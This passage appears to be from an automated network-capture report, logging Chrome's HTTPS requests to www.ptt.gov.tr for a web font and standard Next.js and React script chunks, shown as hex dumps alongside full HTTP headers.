          Data Ascii: S1@~.T8_?'.m*b.WV:z5B]&EzQQf[R:Z:IJ!N3(W]sl dL0+PP{:7IuuEWa(*7#obpbUYSJi^c=P%-E#Ak_fF}87I=x^$!<'AU)
          2024-09-01 22:25:36 UTC7271INData Raw: 16 80 65 5b b0 33 4e 77 fd 64 3c ea 7a ce 93 ba 05 3d c7 c0 ec c9 02 0a 06 ab e0 46 88 1a 70 23 6e cf 23 9e 6f 19 2b 70 70 fc 22 66 91 f1 bd 19 6f 25 9a 46 da 6f 62 ae cb fe 80 82 61 16 20 f4 07 30 7c 3c 04 cb 2a 59 c6 1f 30 76 ea 87 cf 6b c1 b3 dc 2c 98 46 0e c6 ea fb e0 db e8 cc 0a 3f 84 d0 60 4f 89 dd 78 06 71 0e 49 b0 3e 95 2a 2b 58 93 71 42 12 43 e1 9a 64 3a 62 b4 93 34 51 0b c3 f2 cd e7 23 8e 21 23 59 9a 04 49 84 4d 3a 31 51 37 74 22 0b c5 bb 89 e2 fb 0a 7f 2b f6 7d 9c 21 05 83 b1 25 bc 84 4f ec bf ac bc af 74 ac 33 0d 97 97 04 8d e9 46 dd 34 95 99 f1 37 18 63 1b ec ed f0 96 d0 34 15 51 64 4c bf 2e d4 fe 52 1c 49 97 0c 8c 7f 26 f8 7f f0 97 cc 93 c7 9c 0f 7e 74 fd 55 3a 91 05 51 2d 4f d4 7f 69 fc 48 18 86 a1 af bd fd b6 f0 00 ce 23 0d d9 28 41 97 a3
          Data Ascii: e[3Nwd<z=Fp#n#o+pp"fo%Foba 0|<*Y0vk,F?`OxqI>*+XqBCd:b4Q#!#YIM:1Q7t"+}!%Ot3F47c4QdL.RI&~tU:Q-OiH#(A
          2024-09-01 22:25:36 UTC7271INData Raw: 4d 9b 54 bc c3 94 6d 3e ec 38 e7 19 2e 5c 16 e2 5d e5 cb 38 28 60 76 de e9 f5 7a bb 05 99 02 f4 6c 73 4d d3 d6 4c db d0 27 1f f2 31 f6 1f 9a d4 8d 80 f3 01 d1 55 36 20 e7 f6 96 86 3a 19 8c bf ff 90 0c f4 1c b2 0f b8 24 87 ef a3 59 74 25 f2 81 32 aa 97 51 1c 43 2e 89 9c 44 f5 92 8d 82 e0 06 a8 30 10 27 50 7e b1 30 be 70 14 4a 3b 8b a9 3c 77 f8 3b db d4 8d c6 f8 9e ba a1 9b 76 4f 51 7a b6 a9 1b 75 78 6a 5e f0 e5 44 d6 b0 4a 0d 80 8d 9f 1f 50 59 38 40 dd 5d a6 41 29 14 30 3b 0f 5f d7 0d db ac 56 4d db d0 f1 a7 f3 7e 0e 3e 96 dc 37 d4 60 8c 52 7e 8e 82 fc b8 05 8c 19 43 4d 19 a4 93 70 29 e9 ea a4 0e 6d 72 e9 5e ff 45 d1 8a eb 49 16 a4 b1 e0 c1 a4 4d be b6 e6 ba 08 3b 7d ea 1a 8d 74 fc de fa 8b 09 2c 7a ff a7 1a b8 6e 0d 8b ea a7 76 2a 6d 34 a0 fa 48 f2 5a 90
          Data Ascii: MTm>8.\]8(`vzlsML'1U6 :$Yt%2QC.D0'P~0pJ;<w;vOQzuxj^DJPY8@]A)0;_VM~>7`R~CMp)mr^EIM;}t,znv*m4HZ
          2024-09-01 22:25:36 UTC7271INData Raw: 6a 5e b8 f5 6e b6 40 87 19 55 18 fe 98 f0 b0 91 47 96 2d c7 a4 cf b9 f3 7e 6c 8f 9c c5 5b 26 f9 fe fe ed 7f bd 17 f2 fb 51 21 b7 10 6b 42 51 d5 c5 7f 4c f7 56 1d a3 91 1e 48 d9 67 3a 1a e2 d1 ba d7 91 a8 99 7b 9d 14 8c 0b 86 28 18 f5 5b 2e 2d fc c5 e0 9e aa 7a 92 4a 12 80 24 d1 93 57 1c 92 ef ce 48 d9 af 7a 85 a7 35 ed a8 c8 f3 ca 87 15 9e 17 8f ca 9d 79 f2 e5 ed 7b cb 87 20 51 96 0f 22 07 d9 a4 5a e6 9c d9 30 38 79 f2 eb 47 41 55 bf ff e5 8f 1e 85 2f ee 60 14 a8 a7 30 40 f9 9a 5b 3a 0a 79 a6 46 ee a2 d8 75 49 cd e7 19 49 dc f5 51 85 dc 52 ea 5a c3 4b 06 0c 6b f5 19 8c f5 0c 53 3f 77 b4 bd ee 0d 01 9a a2 f6 36 b2 29 95 53 d9 1c 98 72 4a a5 fa 30 f3 e5 e8 76 8b 23 dd 51 05 82 4e 7c f1 67 6a 44 f4 35 58 ba d2 e0 d0 8b ee 63 c0 79 f3 60 43 52 35 72 bc 20 29
          Data Ascii: j^n@UG-~l[&Q!kBQLVHg:{([.-zJ$WHz5y{ Q"Z08yGAU/`0@[:yFuIIQRZKkS?w6)SrJ0v#QN|gjD5Xcy`CR5r )
          2024-09-01 22:25:36 UTC7271INData Raw: 3f 13 04 95 f9 f9 ca 79 aa 28 54 92 ce b7 f7 ee 6d b7 5a cf d4 96 96 6a 61 b8 e5 97 4a be eb 0e 97 bf f4 43 59 56 d5 2d db 86 5b 6c b0 9e a9 cc cf 57 82 e0 bc 24 51 45 a1 e7 5b ad f6 de bd ed 67 c2 b0 b6 b4 54 db 72 5d bf 54 f2 87 3f ee 64 a8 aa b2 bc 65 e7 f3 36 c2 97 fd a3 8a a8 e3 f0 ea b0 e0 c2 84 a5 ec 36 b6 dc 87 be 7b b1 a9 41 5b c0 35 1e c7 be d2 2e fc 0b d2 96 67 08 db 27 2b ee f1 fe a5 60 5f 69 8f 99 b9 81 45 55 b4 3e b4 ef ed f2 f9 50 a3 c8 fc 41 45 bd 79 04 82 21 1c 2f a6 41 05 bf c2 5e 10 8f b6 1e dc 45 3d 08 6c 09 fd dc d7 bc f3 ba 00 7f c9 7b f5 52 b6 0f 89 f7 b8 91 f9 f0 c5 2a aa ca ec 21 a8 b1 6b d3 d1 43 94 54 d9 ed a5 58 92 27 9b 84 78 16 40 9e 72 69 ab 57 8e 83 c7 2c da 64 bf e7 46 c5 c3 d5 a3 27 0f 5a f5 44 9b 65 90 9e 09 9f 1b 31 0f
          Data Ascii: ?y(TmZjaJCYV-[lW$QE[gTr]T?de66{A[5.g'+`_iEU>PAEy!/A^E=l{R*!kCTX'x@riW,dF'ZDe1


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          133192.168.2.449880185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC624OUTGET /_next/static/media/fa-brands-400.e465758e.woff2 HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://www.ptt.gov.tr
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: font
          Referer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.css
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC351INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: font/woff2
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"1ca7c-19178e938a0"
          Date: Sun, 01 Sep 2024 22:25:35 GMT
          Content-Length: 117372
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:36 UTC6920INData Raw: 77 4f 46 32 00 01 00 00 00 01 ca 7c 00 0a 00 00 00 03 14 3d 00 01 ca 31 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 54 00 a5 7e ca 8b d6 7c cb 90 58 05 88 1d 07 20 25 1e 8a 71 eb 80 d4 e0 3c 00 00 d4 d6 9f 07 65 44 d6 69 7b 00 54 55 55 6f 09 c1 dd ab f6 1f 20 fc f4 cb 6f 7f f8 d3 5f fe f6 8f 7f fd e7 7f 7f 19 18 bb 03 62 d9 8e eb f9 86 ff af fd b2 f3 ee cc 0f 30 bb d8 85 5e 20 76 04 6a 75 2f d8 65 61 22 64 54 2a b2 cb 4f f9 95 80 2e 08 6f 09 37 cb 60 a2 d7 89 02 2f ea bc 9a f3 22 e6 65 d2 17 23 c9 95 32 85 07 a8 3f b1 f7 eb 60 0a 43 2b f0 04 38 55 16 ca 1c 2e 4b 20 e6 22 47 07 00 cf 12 23 44 76 36 2d ff df 3b ad fe de 12 94 4a aa 92 2d 0b ca 10 b0 ad 58 0a 50 59 b1 94 b8 c9 9d 4e 0f 60 86 e8 c4 fb
          Data Ascii: wOF2|=16$ `T~|X %q<eDi{TUUo o_b0^ vju/ea"dT*O.o7`/"e#2?`C+8U.K "G#Dv6-;J-XPYN`
          2024-09-01 22:25:36 UTC7271INData Raw: 8c be ee ba 5f 9f fe 5b 05 bc b4 b0 20 fb d7 38 c2 b7 c0 d2 d7 21 54 9e 4d 61 e7 b3 a5 78 de d5 30 2c 21 3d cf 91 20 2c 4d bf bb bc 0e 7f df 2c 4f bf 8c cb 97 77 89 e9 28 b2 cc 12 5e 98 fe f9 e5 2e 46 16 0e eb 44 0b 87 3d ed 47 36 a0 ea 09 14 f1 b9 d2 a4 2e 11 a1 80 8f 37 24 4f d6 3a 9d 28 0c a3 4e 67 6d e9 f9 9f e0 fc c2 4e ef dc b9 de ce c2 3c be af 1b 86 51 27 59 5d 4d f6 93 9f 1b 19 5f c8 b2 c5 85 85 c5 2c bb f0 50 f0 dd de dd 18 16 61 93 27 48 99 03 51 c5 07 f4 64 16 67 6e bb 0d a9 c2 c8 6b 3b 6c a9 95 c1 70 38 0c a6 d8 21 51 98 81 61 86 61 eb 64 32 38 dc a4 9d e2 cf e3 17 fa 59 32 00 28 e2 c3 f7 92 79 11 2f 20 bb f7 4c 6a 52 63 28 0e 82 e5 11 69 52 a9 20 f3 f1 a4 03 b2 b1 71 b0 1e df 64 21 3a b6 10 ec c6 c5 4a bc 0d d6 7a 07 ff 04 08 5b bd ed ed fd
          Data Ascii: _[ 8!TMax0,!= ,M,Ow(^.FD=G6.7$O:(NgmN<Q'Y]M_,Pa'HQdgnk;lp8!Qaad28Y2(y/ LjRc(iR qd!:Jz[
          2024-09-01 22:25:36 UTC7271INData Raw: d2 a2 0e bb cb 2b 8d a7 ac ae ae fe cb b3 ee 5d bb f6 da 6b 05 63 98 1e 7b d3 73 9e f3 1c 08 b5 e0 f4 e6 7b 88 d8 fb c9 de 15 94 70 85 9c 27 af 24 df 85 3a 1c 80 bb 09 49 13 29 a4 28 b0 e8 b1 d5 24 9d 94 93 34 99 26 69 14 e5 01 9d 50 d8 a0 1a b1 b3 ab cb 7c e3 83 16 cf ce 65 ba 4b 9f 9a 6d 54 e0 d9 bd 34 92 51 f6 d4 61 1f ad f8 2e 76 7a d4 5e 22 23 59 fa e0 eb dc c0 0b 66 51 32 2e f2 39 c7 12 a6 b3 23 b3 e9 62 ba c8 05 5a 8e f2 41 36 28 f2 2c 9f 0f e6 79 31 46 b8 7e 5c 49 43 99 bf e5 7c 3e 2b 23 50 70 0f a8 c9 cc af 78 ae f9 2c 8f 56 81 76 a6 5b e4 c5 40 5f f6 55 fe 7c a7 8b 6a 32 2d 55 43 5c eb 6d 95 58 cb c4 72 de 2c 65 37 3d 4c 8f 1d 8d 63 69 29 d7 9f 4a 21 cb df 66 dd e4 d9 dd fb 76 0c f3 cc 55 f7 f6 4b c6 00 20 d4 01 91 22 af b2 1c 70 03 90 52 40 0a
          Data Ascii: +]kc{s{p'$:I)($4&iP|eKmT4Qa.vz^"#YfQ2.9#bZA6(,y1F~\IC|>+#Ppx,Vv[@_U|j2-UC\mXr,e7=Lci)J!fvUK "pR@
          2024-09-01 22:25:36 UTC7271INData Raw: 73 f3 d4 ce fa 5a a0 2a 8a d9 01 63 5d 61 16 a4 85 0c 52 40 34 cc 96 5d 00 d4 db 63 44 a9 8d 34 60 bc 92 6f ec c7 48 e0 31 b2 9f 10 48 e2 b2 1c 8b 19 97 80 40 dd 64 3a a9 3a 07 51 92 12 9b a3 24 e5 f3 15 04 cd 35 83 ff 01 d9 e0 f8 b1 7b ef 38 6d d9 57 ef 0c 1b 0d 43 1b ae 3d 4a 53 88 1b 1b 14 9c 62 a7 3a 86 d0 ee 6c 6c 77 86 5d bb df 6d 27 5d 58 91 e2 f4 08 2b f5 6d 01 6c 40 14 75 81 aa 56 ab 40 0b bb fb da b5 71 bb cd 2c 6b a3 d3 01 e8 c9 60 14 33 bb 97 b6 f3 fa 6d 8c b3 7d 80 10 5f a0 b0 80 0c 69 7d 7c 03 a5 c8 83 2d aa 45 55 22 19 27 ea ed e2 7c 71 f3 eb 5d ee 3d 72 04 af 0c 29 f5 6e ee 3c 7e 3c fd f4 9f e4 0b ce a9 53 1f 7e c4 ac 8a 90 bd df 86 1f c3 d7 89 22 3e 69 90 9f 22 6f 20 ef 20 ef 27 1f 21 a4 12 d9 c0 41 ba 40 a8 3c 41 c4 c9 74 31 cf b3 0e 1d
          Data Ascii: sZ*c]aR@4]cD4`oH1H@d::Q$5{8mWC=JSb:llw]m']X+ml@uV@q,k`3m}_i}|-EU"'|q]=r)n<~<S~">i"o '!A@<At1
          2024-09-01 22:25:36 UTC7271INData Raw: 76 28 91 8b e9 c2 73 aa 1d 97 f3 2c 8c 71 36 2f ed 6d b6 82 66 cb e6 72 20 13 99 5a 0a 5d 62 04 a4 be 17 c4 68 ec 3c 02 b6 25 b2 e1 13 84 14 a9 2c 45 0c e6 26 22 42 40 40 8f c2 02 a0 53 a3 c5 b4 94 28 dc 6c 87 26 f3 c9 3a 85 22 f5 b0 8c e7 71 04 e2 72 91 a6 c5 d6 6f c6 b3 79 3e 17 52 c8 7f e4 9c 73 ce e0 a3 5e bd ee c8 f9 1c 50 68 2d 0a 69 01 e5 c8 05 9a 8e 10 4f dd 34 11 19 73 1d bb 57 ee 93 3e a7 42 f0 a0 13 a8 56 af ab 7e 07 00 0e d4 b2 6c c7 94 4a 81 23 28 37 74 3f 8e 84 1f 22 f8 5a 2a 08 43 8f d9 b6 69 c2 5c 83 c9 1c c7 e4 48 0d 4a 11 91 29 21 c5 5b 34 98 a2 d7 eb 0f 0c 00 64 4e 68 9b 96 0c e3 c8 e4 8a 7a 16 02 d4 6a 8e 8b 20 41 0a 07 8b 79 3f 00 1d b9 8e e4 4a fb 9e 3f ea 23 46 be ef 7e c7 a2 d7 d5 6a b5 a4 77 1a 11 91 3b 41 00 50 73 b5 f9 df 29 02
          Data Ascii: v(s,q6/mfr Z]bh<%,E&"B@@S(l&:"qroy>Rs^Ph-iO4sW>BV~lJ#(7t?"Z*Ci\HJ)![4dNhzj Ay?J?#F~jw;APs)
          2024-09-01 22:25:36 UTC7271INData Raw: cb c0 33 0c c8 9a 57 31 a5 e4 b0 8b 52 1b 6c 63 f8 b0 fe aa 40 66 5d 94 51 a4 02 f9 6c 15 fd dc a9 53 a7 78 1a b9 6e bd e1 79 00 8e d3 a8 db f6 9f 41 ad 06 08 62 2e 00 bb 5d fa ab 10 69 b0 af ff b5 00 d0 03 13 b4 66 4c 29 bf 00 31 d0 a0 34 65 4a 85 3b 13 17 db cc 30 bc e7 a9 6e 1f 41 dd fc a8 69 02 e0 a3 8f 06 52 ca 96 fa 1c a8 55 f9 31 ad d1 f3 bb 7d cf 9b a6 a8 da da f3 7a ad 20 0c 83 96 14 04 87 77 07 52 22 81 1b c9 8d 84 54 45 5a f8 ea d2 47 4a 9a e9 a2 d2 a0 67 84 e6 fc 58 ce ab ca 5c d2 33 21 46 8e 79 24 6b 3b 1a 5f ff 9b ca 9f 86 61 18 47 59 37 0c 21 4e 5a 6b 61 e0 50 6e 0d b2 ab aa 7e 1f b0 db 2b b8 18 52 58 59 63 07 8c 0b 6b 9d 2e e2 29 2d db be 0f 70 70 23 49 0c 46 fd 4e fb ba a3 fd 01 be a2 ac d7 6e 9c 4e a7 e8 ba 58 af ad 2d 92 14 da ed a9 e5
          Data Ascii: 3W1Rlc@f]QlSxnyAb.]ifL)14eJ;0nAiRU1}z wR"TEZGJgX\3!Fy$k;_aGY7!NZkaPn~+RXYck.)-pp#IFNnNX-
          2024-09-01 22:25:36 UTC7271INData Raw: 01 d0 29 06 49 d7 62 dd 4a 27 3a d5 09 49 6a 05 2d d3 20 b2 0c 98 31 cb f2 7d c7 76 f7 cc cc ea 16 16 2a ad f9 56 9f 5b 96 b3 b0 22 60 01 5f 38 bf 00 cd d6 dc dc 99 9c 23 84 30 42 3b 5f 80 7f c2 69 94 a2 3d 08 01 e3 79 ce b4 d5 47 06 fd 82 f1 ea 97 b2 d5 b1 83 dc f3 d3 d8 46 d3 a1 71 d4 a4 24 bc 7c c6 61 e1 d8 60 48 e9 a0 92 26 d3 45 f7 8c cb 18 5b 19 8f ea 75 a1 7a 8f e1 b2 d5 6e 71 75 a3 15 d7 a7 a2 28 8a a6 1a ad b8 31 2a 59 96 35 82 d7 08 8b 8b e7 9e 77 66 cb 75 6a 4b 98 b4 9a 45 b1 2a 8e 3f 19 61 b1 b6 7d 9b 0d e0 95 7a b3 7b f7 ce f6 4a 2e 06 7b b0 b2 b2 77 a5 ef ef b5 fe 01 2c c0 a7 d0 10 ed 45 3f 68 c1 38 7f 0c c2 01 24 cb 1e 7d 4b 68 c3 45 86 4c 17 5b 2e b4 d9 35 32 89 19 a6 98 3e 52 dc ed a3 f1 b8 21 91 f6 6a 0a 3f 96 18 9b 2b 2e 3f b2 b2 ea fa
          Data Ascii: )IbJ':Ij- 1}v*V["`_8#0B;_i=yGFq$|a`H&E[uznqu(1*Y5wfujKE*?a}z{J.{w,E?h8$}KhEL[.52>R!j?+.?
          2024-09-01 22:25:36 UTC7271INData Raw: 28 3a 00 ca 34 bd 40 08 73 43 2a a9 24 67 ce 23 27 77 76 fa 97 ff fd b4 ee 30 ca 03 ad b8 00 e5 19 42 3a ed 5a 10 50 6c 75 92 58 81 52 7e e4 79 9a 0a 00 60 26 22 98 a6 b6 c0 6c 34 6a 4c 98 69 8d ea 5a 2d e1 94 72 cb d0 c2 0e a0 6a 3e 95 e0 79 34 0d b4 eb c5 36 e7 94 f9 cd 66 0b 94 94 5e 18 19 a2 5e cb 86 2d 2f 08 ec 24 8a a4 f0 ea 02 f6 12 a6 f8 01 c4 1b 41 28 da 78 31 5f 04 c4 a0 28 a8 3b 2f 27 53 ad 56 ec 7c e0 fe 60 1d 29 ce ca 41 36 ad b4 79 3e 69 5a 8a 58 c8 28 c6 5c 98 e4 c5 a4 60 4d 82 59 d6 67 ab 45 35 85 4b 50 35 ac 7e eb 2d b7 3c 5b c9 ba 69 00 a0 a1 9b 52 21 5d d9 dd 3d 71 62 81 ad a6 4a 8a 20 4d a3 f6 46 9b de 0a a1 10 02 68 c3 ec 61 0e 0d 04 26 45 04 51 38 d9 bc 7d d5 f3 3c ce 93 fb 65 b3 d9 6e db 14 58 1d 81 09 e1 e7 07 0f 1e 3e b4 1a 70 c1
          Data Ascii: (:4@sC*$g#'wv0B:ZPluXR~y`&"l4jLiZ-rj>y46f^^-/$A(x1_(;/'SV|`)A6y>iZX(\`MYgE5KP5~-<[iR!]=qbJ MFha&EQ8}<enX>p
          2024-09-01 22:25:36 UTC7271INData Raw: 36 b8 9e eb 22 f8 33 d7 30 61 a0 5e ab 0d f7 29 12 b2 fb 24 a8 5d 90 52 af 48 50 fd 46 18 c2 55 c0 3b 82 23 05 c3 0e 2c c7 34 a1 b5 e2 98 26 80 11 13 52 f6 d0 86 e0 3e 0c 52 e5 d4 09 c3 3b 57 fe 3b 24 a3 4e 90 78 21 22 b3 07 64 65 51 4e 73 eb 7c 89 f6 71 ce 9f ff 1c fb be a7 88 92 ce 17 ec 63 ec 61 f9 32 f1 f7 bf 5f c6 0d db db db 93 9f 6e b7 af ca 1d ef 10 6c 6d d3 6d 9b c6 63 1f 87 cf c3 d7 c9 5a 8b 38 cc 74 4b c9 86 92 e1 76 c2 5c 02 88 e1 3b 03 b7 39 8d 46 a7 7b fa f9 75 da 1b 9d 46 c3 89 8e 0f b6 b7 ab 66 eb cb 50 6d 6f 0f 8e 47 6f ab b9 2e 74 da 1b 1b ed 0e b8 6e fd fa 22 8f 93 66 ed 55 49 e2 bc b8 8e 08 92 ec fd 12 ae c1 b7 c9 41 f2 61 f2 d7 70 2f d6 b0 4d 48 98 57 51 ba a8 d2 6d 93 8a 1a eb 81 ed 3c 9b 35 0e c5 5d fb e4 28 16 e9 24 1e 97 83 78 5c
          Data Ascii: 6"30a^)$]RHPFU;#,4&R>R;W;$Nx!"deQNs|qca2_nlmmcZ8tKv\;9F{uFfPmoGo.tn"fUIAap/MHWQm<5]($x\
          2024-09-01 22:25:36 UTC7271INData Raw: 59 35 b4 52 dd 3d cc e9 24 81 59 06 1a c5 a4 28 5a 6b 47 0e f1 6e 59 3d cf af b6 e8 8f 4c 5d cd 16 eb 46 35 71 cf cb a2 94 f0 53 67 5f 03 6f 38 fb 1a 96 67 fd 5e 9e 71 78 23 65 59 b7 97 a5 6c e6 05 67 c4 85 6f 31 5e 31 16 31 ce 3f 59 1b dc e7 35 94 2f c5 81 b3 88 b1 8a b3 d6 e2 79 01 1c c1 68 0e 8c e3 4c 2d 00 99 17 82 98 10 be 60 54 10 02 47 a1 b5 6e b4 ff 1c a9 0c b1 0f b4 16 c8 01 29 67 c8 b9 f7 42 30 12 c2 33 04 e1 94 02 04 2e 18 09 04 0e 02 6e f5 b3 9c 9d 7d 0d cb d2 5e 2f cb 18 bc 9e e7 59 ef ec 75 6f 68 6a 62 c8 09 11 4c b7 db f1 c6 20 1a e3 3b dd ae 61 7b d0 48 b1 c1 26 e2 58 a7 fa fd 2b af 8a a5 20 e4 d8 91 4a 81 31 04 a9 2a 23 2b eb 9b 18 05 56 5e 19 5b 49 53 29 49 ac 02 97 2d e5 48 42 c6 af bc da ef 2b c9 e5 4e cc 38 b4 67 df f7 2d f8 13 b8 15
          Data Ascii: Y5R=$Y(ZkGnY=L]F5qSg_o8g^qx#eYlgo1^11?Y5/yhL-`TGn)gB03.n}^/YuohjbL ;a{H&X+ J1*#+V^[IS)I-HB+N8g-


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          134192.168.2.449878185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC602OUTGET /_next/static/chunks/webpack-9869d3074c720ef6.js HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: script
          Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC398INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: application/javascript; charset=UTF-8
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"102b-19178e938a0"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:35 GMT
          Content-Length: 4139
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:36 UTC4139INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 76 61 72 20 6f 3d 74 5b 72 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 20 6f 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 75 3d 74 5b 72 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 69 3d 21 30 3b 74 72 79 7b 65 5b 72 5d 2e 63 61 6c 6c 28 75 2e 65 78 70 6f 72 74 73 2c 75 2c 75 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 69 26 26 64 65 6c 65 74 65 20 74 5b 72 5d 7d 72 65 74 75 72 6e 20 75 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 6e 2e 4f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6f 2c 75 29
          Data Ascii: !function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r].call(u.exports,u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u)


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          135192.168.2.449881185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC604OUTGET /_next/static/chunks/framework-0438cefc59f69f60.js HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: script
          Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC401INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: application/javascript; charset=UTF-8
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"226bf-19178e938a0"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:35 GMT
          Content-Length: 140991
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:36 UTC6870INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 37 37 34 5d 2c 7b 32 37 36 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 72 3d 74 28 32 34 36 36 29 2c 6c 3d 74 28 31 30 36 32 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 64 6f 63 73 2f 65 72 72 6f 72 2d 64 65 63 6f 64 65 72 2e 68 74 6d 6c 3f 69 6e 76 61 72 69 61 6e 74 3d 22 2b 65 2c 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 6e 2b 3d 22 26 61 72 67 73 5b 5d 3d 22 2b 65 6e 63 6f 64 65 55 52 49
          Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{2760:function(e,n,t){var r=t(2466),l=t(1062);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURI
          2024-09-01 22:25:36 UTC7271INData Raw: 22 5c 6e 22 29 2c 6f 3d 6c 2e 6c 65 6e 67 74 68 2d 31 2c 75 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 31 3c 3d 6f 26 26 30 3c 3d 75 26 26 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 3b 29 75 2d 2d 3b 66 6f 72 28 3b 31 3c 3d 6f 26 26 30 3c 3d 75 3b 6f 2d 2d 2c 75 2d 2d 29 69 66 28 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 29 7b 69 66 28 31 21 3d 3d 6f 7c 7c 31 21 3d 3d 75 29 64 6f 7b 69 66 28 6f 2d 2d 2c 30 3e 2d 2d 75 7c 7c 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 29 7b 76 61 72 20 69 3d 22 5c 6e 22 2b 6c 5b 6f 5d 2e 72 65 70 6c 61 63 65 28 22 20 61 74 20 6e 65 77 20 22 2c 22 20 61 74 20 22 29 3b 72 65 74 75 72 6e 20 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 26 26 69 2e 69 6e 63 6c 75 64 65 73 28 22 3c 61 6e 6f 6e 79 6d 6f 75 73 3e 22 29 26 26 28 69 3d 69 2e 72 65 70 6c 61 63 65 28 22 3c 61
